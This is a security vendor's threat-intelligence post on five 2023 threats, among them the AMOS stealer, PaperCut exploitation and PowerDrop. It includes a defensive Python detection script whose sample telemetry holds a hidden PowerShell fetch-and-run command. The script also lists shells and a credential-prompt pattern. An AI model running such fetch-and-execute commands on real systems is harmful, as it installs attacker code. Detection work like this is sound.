Top 5 Cyber Threats Observed in the United States (May-June 2023)

At SISA, we understand the ever-evolving nature of cyber threats and the importance of staying one step ahead to protect your organization’s sensitive data and assets. Our team of experts continuously monitors a range of sources, gathers intelligence, and analyzes emerging threats to provide actionable insight into the risks that can affect organizations.

This monthly post provides a condensed overview of the threats encountered throughout the month.

Our team brings to you five significant threats that have recently targeted the United States, including AMOS malware stealing keychain passwords and crypto wallets, the Bl00dy Ransomware Gang exploiting critical vulnerabilities in PaperCut servers, the notorious FIN7 group resurfacing with Cl0p ransomware, Anonymous Sudan launching DDoS attacks on Outlook.com, and the insidious PowerDrop malware targeting the U.S. aerospace defense industry.

Read on to discover more…

1. A new Mac malware that steals Keychain passwords and crypto wallets

AMOS (Atomic macOS Stealer) is an information stealer sold to cybercriminals as a service, priced at $1,000 per month, and actively used against macOS users. The package includes a web panel for managing victims, a MetaMask brute-forcer, a cryptocurrency checker, and a DMG installer. It is distributed through phishing emails, malvertising, social media posts, and instant messages. Once executed, AMOS displays a fake system password dialog; the password the victim types in is used to unlock the macOS Keychain, from which the stealer extracts saved logins and other stored secrets. It also collects data from cryptocurrency wallets and web browsers, and files from the victim’s Desktop and Documents folders. The stolen data is compressed into a ZIP archive and sent to the attacker’s command-and-control server.

2. Bl00dy ransomware gang strikes education sector with critical PaperCut vulnerability

The Bl00dy Ransomware Gang has been targeting vulnerable PaperCut servers in the education sector by exploiting CVE-2023-27350. The flaw, an improper access control bug in PaperCut NG and PaperCut MF 8.0 and later (fixed in 20.1.7, 21.2.11 and 22.0.9), lets an unauthenticated attacker bypass authentication, reach the administrative interface and execute code through the server’s built-in scripting feature. The FBI and CISA issued a joint advisory on this activity in May 2023. The gang gained access to victims’ networks, exfiltrated data and then encrypted systems. They used Tor and other proxies inside the victims’ networks to mask their traffic and avoid detection. Because the PaperCut server process runs with elevated privileges, code executed through the flaw inherits SYSTEM (Windows) or root (Linux) privileges, which gave the attackers a ready platform for post-exploitation activity. The gang left ransom notes on compromised systems demanding payment to decrypt the files.
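
Both of the threats above leave a distinctive process-tree footprint that endpoint telemetry can catch: AMOS runs `osascript` to draw a password dialog with a hidden answer field, and exploitation of CVE-2023-27350 shows up as the PaperCut service process (`pc-app.exe` on Windows) spawning a shell or script host, a check recommended in public reporting on the PaperCut attacks. The following is an added example, not code from SISA, PaperCut or any EDR vendor; it runs both rules over constructed sample events, and the event field names (host, os, parent_image, image, cmdline) are an assumed Sysmon/EDR-style export rather than a real product schema.

```python
"""Flag suspicious process-creation events in endpoint telemetry.

Added example (not vendor or SISA code). Two rules drawn from the threats above:

  * macOS: `osascript` building a dialog `with hidden answer`, the fake
    system-password prompt AMOS uses to collect the login password that
    unlocks the Keychain.
  * Windows: the PaperCut application server process `pc-app.exe` spawning
    a shell or script host, the pattern CVE-2023-27350 exploitation leaves
    behind because the server runs attacker code as SYSTEM through its
    scripting interface.

Event records are constructed; the field names are an assumed Sysmon/EDR-style
export, not a real product schema.
"""
import re
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    host: str
    os: str            # "macos" or "windows"
    parent_image: str  # full path of the parent process
    image: str         # full path of the new process
    cmdline: str


# Script hosts and shells that pc-app.exe has no business launching.
SHELLS_AND_HOSTS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "certutil.exe", "curl.exe", "bitsadmin.exe",
}

# AppleScript password dialog: the typed answer is masked, which is exactly
# what a stealer wants when it impersonates a system prompt.
_HIDDEN_ANSWER = re.compile(r"display\s+dialog.*with\s+hidden\s+answer", re.I | re.S)


def basename(path: str) -> str:
    """Last path component, lower-cased, for either path separator."""
    return re.split(r"[\\/]", path)[-1].lower()


def check_amos_password_prompt(ev: ProcEvent) -> Optional[str]:
    if ev.os != "macos" or basename(ev.image) != "osascript":
        return None
    if _HIDDEN_ANSWER.search(ev.cmdline):
        return "osascript password dialog (AMOS-style credential prompt)"
    return None


def check_papercut_child(ev: ProcEvent) -> Optional[str]:
    if ev.os != "windows" or basename(ev.parent_image) != "pc-app.exe":
        return None
    child = basename(ev.image)
    if child in SHELLS_AND_HOSTS:
        return f"pc-app.exe spawned {child} (CVE-2023-27350 post-exploitation pattern)"
    return None


RULES: Tuple[Callable[[ProcEvent], Optional[str]], ...] = (
    check_amos_password_prompt,
    check_papercut_child,
)


def triage(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Return (host, reason) for every event that trips a rule."""
    hits = []
    for ev in events:
        for rule in RULES:
            reason = rule(ev)
            if reason:
                hits.append((ev.host, reason))
    return hits


# Constructed sample telemetry (hostnames, paths and addresses are made up).
SAMPLE_EVENTS = [
    ProcEvent("mac-01", "macos", "/bin/zsh", "/usr/bin/osascript",
              "osascript -e 'display notification \"Backup done\" with title \"Backup\"'"),
    ProcEvent("mac-02", "macos", "/Users/ana/Downloads/Setup", "/usr/bin/osascript",
              "osascript -e 'display dialog \"macOS needs to access System Settings\" "
              "default answer \"\" with icon caution with hidden answer'"),
    ProcEvent("win-fs01", "windows", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent("win-print01", "windows",
              r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
              r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c powershell -nop -w hidden -c "iwr http://198.51.100.4/a.ps1 | iex"'),
]

if __name__ == "__main__":
    for host, reason in triage(SAMPLE_EVENTS):
        print(f"{host}: {reason}")
```

In practice the same two rules translate directly into an EDR or SIEM query (parent image equals pc-app.exe and child image in a shell list; image equals osascript and command line contains "with hidden answer"); the PaperCut rule is the higher-confidence of the two, since a print server has essentially no legitimate reason to launch PowerShell, whereas some Mac admin scripts do prompt for passwords.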

3. Notorious FIN7 returns with Cl0p ransomware in new wave of attacks

FIN7, a cybercrime group known for targeting the U.S. retail, restaurant, and hospitality sectors, resurfaced after a two-year lull to carry out opportunistic ransomware attacks. The group has deployed several ransomware families in the past, including REvil, Maze, DarkSide, and BlackMatter. In the recent attacks, FIN7 used POWERTRASH, a PowerShell-based in-memory dropper, to load the Lizar post-exploitation tool on compromised devices. From that foothold the operators moved laterally, using OpenSSH and Impacket, and deployed Clop ransomware. Microsoft has also noted that FIN7’s return is not limited to Clop: the group has been linked to attacks on PaperCut print servers involving Bl00dy, LockBit, and Clop ransomware. Other groups have been seen using FIN7 tooling as well; the financially motivated FIN11, for example, was observed using inv.ps1, a PowerShell script reported to be used by FIN7 to deploy the Lizar toolkit.

4. Outlook.com hit by outages as Anonymous Sudan claims DDoS attacks

Outlook.com recently suffered repeated outages that affected thousands of users in the United States, after the hacktivist group Anonymous Sudan announced a campaign against US companies and infrastructure. The disruptions prevented users around the world from accessing or sending email on the web and in the Outlook mobile app. Microsoft initially attributed the outages to technical issues, while Anonymous Sudan claimed responsibility for DDoS attacks against Microsoft, citing its opposition to US involvement in Sudan’s internal affairs. One outage-monitoring site recorded reports from about 15,000 users at the peak. The group taunted Microsoft in posts about its repeated DDoS attacks on Outlook and Microsoft 365 services, sharing images of its alleged activity on its Telegram channels. Microsoft later confirmed that the early-June outages were caused by layer 7 DDoS attacks (HTTP(S) floods, cache-bypass requests and Slowloris) from an actor it tracks as Storm-1359.

5. A new insidious PowerShell script targets the US aerospace defense industry

Security researchers uncovered a new PowerShell-based malware named PowerDrop, believed to be targeting the US aerospace industry; a sample was found on the network of a US defense contractor. The script uses encoding and encryption to evade detection and combines PowerShell with Windows Management Instrumentation (WMI) to act as a remote access trojan (RAT), with a WMI event subscription providing persistence. Its command-and-control channel is ICMP: an echo request to the operator’s server acts as the beacon that triggers tasking, and the results of executed commands are exfiltrated inside ICMP ping payloads, so the traffic blends in with ordinary network diagnostics. Analysts believe the script could have been delivered through an exploit, a phishing email, or a spoofed software download site. PowerDrop’s objective appears to be executing remote commands inside infiltrated networks and maintaining persistence on targeted servers. The combination of tradecraft, timing, and target suggests a state-sponsored actor.


Key recommendations to combat cyber risks:

  • Use strong, unique passwords and enable multi-factor authentication wherever possible.
  • Exercise caution with links and attachments received via email, and with software downloaded from unverified sites.
  • Keep devices, operating systems, and applications up to date so they carry the latest security patches; PaperCut NG/MF in particular should be on a fixed release (20.1.7, 21.2.11 or 22.0.9, or later).
  • Install reputable antivirus and internet security software on your systems.
  • Employ Endpoint Detection and Response (EDR) tooling that covers multiple stages of the attack lifecycle, so a payload is still blocked when the initial access is missed.
  • Review domain controllers, servers, workstations, and Active Directory for new or unrecognized accounts.
  • Audit accounts with administrative privileges and configure access controls according to the principle of least privilege.
  • Enroll in a cloud-based DDoS mitigation service.
  • Conduct regular vulnerability scans of Windows systems and of internet-facing servers such as PaperCut.
  • Watch for unusual ICMP (ping) traffic leaving your network, such as echo requests with atypical payload sizes or contents or a host pinging one external address on a schedule, which can carry command-and-control traffic or exfiltrated data.


To get updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories or check out SISA Weekly Threat Watch on our website.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.
